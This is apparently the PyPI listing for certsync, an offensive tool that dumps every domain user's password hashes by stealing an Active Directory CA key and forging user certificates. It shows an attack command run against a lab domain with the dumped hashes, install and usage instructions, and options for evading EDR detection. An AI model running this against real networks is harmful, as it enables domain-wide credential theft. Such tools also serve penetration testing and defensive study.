# certsync
`certsync` is a new technique in order to dump NTDS remotely, but this time **without DRSUAPI**: it uses [golden certificate](https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate) and [UnPAC the hash](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash).
It works in several steps:
1. Dump user list, CA informations and CRL from LDAP
2. Dump CA certificate and private key
3. Forge offline a certificate for every user
4. UnPAC the hash for every user in order to get nt and lm hashes
```text
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
```
Contrary to what we may think, the attack is not at all slower.
## Table of Contents
- [certsync](#certsync)
- [Table of Contents](#table-of-contents)
- [Installation](#installation)
- [Usage](#usage)
- [Why](#why)
- [Requirements](#requirements)
- [Limitations](#limitation)
- [OPSEC](#opsec)
- [Credits](#credits)
## Installation
Locally:
```text
git clone https://github.com/zblurx/certsync
cd certsync
pip install .
```
From Pypi:
```text
pip install certsync
```
From BlackArch:
```text
pacman -S certsync
```
All OS distribution packages:
[](https://repology.org/project/certsync-ntds/versions)
## Usage
```text
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
[-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
[-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]
Dump NTDS with golden certificates and UnPAC the hash
options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename
CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate. If used, will skip backup of CA certificate and private key
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP
authentication options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
Username
-p password, -password password
Password
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connection
-randomize Randomize certificate generation. Takes longer to generate all the certificates
```
## Why
DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, `certsync` does not require to use a Domain Administrator, it only require a CA Administrator.
## Requirements
This attack needs:
- A configured Entreprise CA on an ADCS server in the domain,
- PKINIT working,
- An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.
## Limitations
Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.
## OPSEC
Some options were added to customize the behaviour of the tool:
- `-ldap-filter`: change the LDAP filter used to select usernames to certsync.
- `-template`: use an already delivered certificate to mimic it when forging users certificates.
- `-timeout` and `-jitter`: change timeout between PKINIT authentication requests.
- `-randomize`: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.
## Credits
- [Olivier Lyak](https://twitter.com/ly4k_) for all his work on ADCS and [certipy](https://github.com/ly4k/Certipy).
- [Benjamin Delpy](https://twitter.com/gentilkiwi) for the unPAC the hash technique.
- [Will Schroeder](https://twitter.com/harmj0y) and [Lee Christensen](https://twitter.com/tifkin_) for [Certified Pre-Owned](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) and [Certify](https://github.com/GhostPack/Certify).
- [Mayfly](https://twitter.com/M4yFly) for his great lab: [GOAD](https://github.com/Orange-Cyberdefense/GOAD).
Raw data
{
"_id": null,
"home_page": "https://github.com/zblurx/certsync",
"name": "certsync",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.7",
"maintainer_email": null,
"keywords": "ntds, certificate, hashes",
"author": "zblurx",
"author_email": "seigneuret.thomas@protonmail.com",
"download_url": "https://files.pythonhosted.org/packages/c8/75/3928920bdbfb0af317446236fad17b47a1d6aad507f1ae2eed6bbf7e7ad9/certsync-0.1.6.tar.gz",
"platform": null,
"description": "# certsync\n\n`certsync` is a new technique in order to dump NTDS remotely, but this time **without DRSUAPI**: it uses [golden certificate](https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate) and [UnPAC the hash](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash).\nIt works in several steps:\n\n1. Dump user list, CA informations and CRL from LDAP\n2. Dump CA certificate and private key\n3. Forge offline a certificate for every user\n4. UnPAC the hash for every user in order to get nt and lm hashes\n\n```text\n$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12\n[*] Collecting userlist, CA info and CRL on LDAP\n[*] Found 13 users in LDAP\n[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)\n[*] Dumping CA certificate and private key\n[*] Forging certificates for every users. This can take some time...\n[*] PKINIT + UnPAC the hashes\nESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::\nESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::\nESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::\nESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::\nESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::\nESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::\nESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::\nESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::\nESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::\nESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::\n```\n\nContrary to what we may think, the attack is not at all slower.\n\n## Table of Contents\n\n- [certsync](#certsync)\n - [Table of Contents](#table-of-contents)\n - [Installation](#installation)\n - [Usage](#usage)\n - [Why](#why)\n - [Requirements](#requirements)\n - [Limitations](#limitation)\n - [OPSEC](#opsec)\n - [Credits](#credits)\n\n## Installation\n\nLocally:\n\n```text\ngit clone https://github.com/zblurx/certsync\ncd certsync\npip install .\n```\n\nFrom Pypi:\n\n```text\npip install certsync\n```\n\nFrom BlackArch:\n\n```text\npacman -S certsync\n```\n\nAll OS distribution packages:\n\n[](https://repology.org/project/certsync-ntds/versions)\n\n## Usage\n\n```text\n$ certsync -h\nusage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]\n [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]\n [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]\n\nDump NTDS with golden certificates and UnPAC the hash\n\noptions:\n -h, --help show this help message and exit\n -debug Turn DEBUG output ON\n -outputfile OUTPUTFILE\n base output filename\n\nCA options:\n -ca-pfx pfx/p12 file name\n Path to CA certificate. If used, will skip backup of CA certificate and private key\n -ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP\n\nauthentication options:\n -d domain.local, -domain domain.local\n Domain name\n -u username, -username username\n Username\n -p password, -password password\n Password\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid\n credentials cannot be found, it will use the ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)\n -kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n\nconnection options:\n -scheme ldap scheme\n -ns nameserver Nameserver for DNS resolution\n -dns-tcp Use TCP instead of UDP for DNS queries\n -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n\nOPSEC options:\n -ldap-filter LDAP_FILTER\n ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))\n -template cert.pfx base template to use in order to forge certificates\n -timeout timeout Timeout between PKINIT connection\n -jitter jitter Jitter between PKINIT connection\n -randomize Randomize certificate generation. Takes longer to generate all the certificates\n```\n\n## Why\n\nDSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, `certsync` does not require to use a Domain Administrator, it only require a CA Administrator.\n\n## Requirements\n\nThis attack needs:\n- A configured Entreprise CA on an ADCS server in the domain,\n- PKINIT working,\n- An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.\n\n## Limitations\n\nSince we cannot PKINIT for users that are revoked, we cannot dump thier hashes.\n\n## OPSEC\n\nSome options were added to customize the behaviour of the tool:\n- `-ldap-filter`: change the LDAP filter used to select usernames to certsync.\n- `-template`: use an already delivered certificate to mimic it when forging users certificates.\n- `-timeout` and `-jitter`: change timeout between PKINIT authentication requests.\n- `-randomize`: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer. \n\n## Credits\n\n- [Olivier Lyak](https://twitter.com/ly4k_) for all his work on ADCS and [certipy](https://github.com/ly4k/Certipy).\n- [Benjamin Delpy](https://twitter.com/gentilkiwi) for the unPAC the hash technique.\n- [Will Schroeder](https://twitter.com/harmj0y) and [Lee Christensen](https://twitter.com/tifkin_) for [Certified Pre-Owned](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) and [Certify](https://github.com/GhostPack/Certify).\n- [Mayfly](https://twitter.com/M4yFly) for his great lab: [GOAD](https://github.com/Orange-Cyberdefense/GOAD).\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Dump NTDS with golden certificates and UnPAC the hash",
"version": "0.1.6",
"project_urls": {
"Homepage": "https://github.com/zblurx/certsync",
"Repository": "https://github.com/zblurx/certsync"
},
"split_keywords": [
"ntds",
" certificate",
" hashes"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "95d0ac439b441c09fd02b625e093f982c36c45b393cb93eeb5f13718c35ea988",
"md5": "c61bc4a19af99ad12ba6bf6b5b7a0a0b",
"sha256": "2dbc559c9e0a39359122b7f9d7d7fd6bfad0519808797632739925099f63dc1f"
},
"downloads": -1,
"filename": "certsync-0.1.6-py3-none-any.whl",
"has_sig": false,
"md5_digest": "c61bc4a19af99ad12ba6bf6b5b7a0a0b",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.7",
"size": 10527,
"upload_time": "2024-03-20T10:49:27",
"upload_time_iso_8601": "2024-03-20T10:49:27.407461Z",
"url": "https://files.pythonhosted.org/packages/95/d0/ac439b441c09fd02b625e093f982c36c45b393cb93eeb5f13718c35ea988/certsync-0.1.6-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "c8753928920bdbfb0af317446236fad17b47a1d6aad507f1ae2eed6bbf7e7ad9",
"md5": "c1339d1a656cb3af927f38d1a01fcd7f",
"sha256": "bbfffd10f36edcb8c4d2d5033f2a2e1e7d641e41d6c5bd11069e7b0827fa1c8d"
},
"downloads": -1,
"filename": "certsync-0.1.6.tar.gz",
"has_sig": false,
"md5_digest": "c1339d1a656cb3af927f38d1a01fcd7f",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.7",
"size": 11417,
"upload_time": "2024-03-20T10:49:29",
"upload_time_iso_8601": "2024-03-20T10:49:29.270285Z",
"url": "https://files.pythonhosted.org/packages/c8/75/3928920bdbfb0af317446236fad17b47a1d6aad507f1ae2eed6bbf7e7ad9/certsync-0.1.6.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-03-20 10:49:29",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "zblurx",
"github_project": "certsync",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"lcname": "certsync"
}
JSON
